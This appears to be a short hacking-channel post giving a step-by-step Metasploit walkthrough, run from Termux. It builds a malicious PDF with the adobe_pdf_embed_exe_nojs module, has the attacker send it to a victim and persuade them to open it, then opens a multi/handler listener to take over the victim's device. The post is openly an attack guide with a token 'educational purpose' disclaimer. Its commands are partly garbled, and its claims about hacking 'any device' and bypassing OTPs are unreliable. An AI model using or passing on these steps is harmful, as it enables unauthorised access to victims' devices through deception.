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How To Hack Any Device Via PDF : Requirement : Termux Me | Dataleak✅🤑

How To Hack Any Device Via PDF :

Requirement :


Note : Only For Educational Purpose Try On Your Own Risk !

Let's Start The Hack :

Open termux and follow the commands mentioned below. First, make sure you have metaploit installed in it.

$ msfconsole

$ use exploit/windows/fileformat/

adobe_pdf_embed_exe_nojs $ setlhost (your IP)

$ set lport (use any port)

$ exploit

Now you have the pdf in metasploit. Move PDF payload to your storage card. Follow the commands below.

ls -la

cd .msfs

cd local

mv (filename)/(move locations)

Now you'll see PDF payload in the SDCard, just send it to the VICTIM and convince to open it. Then you need to start the session.


Follow These Commands :

use exploit/multi/handler
set lhost (IP)
set lport (port)
Now you have access of the victim's phone, you can even bypass the OTP.

This Method is not 100% Accurate but it works for the most of the time!
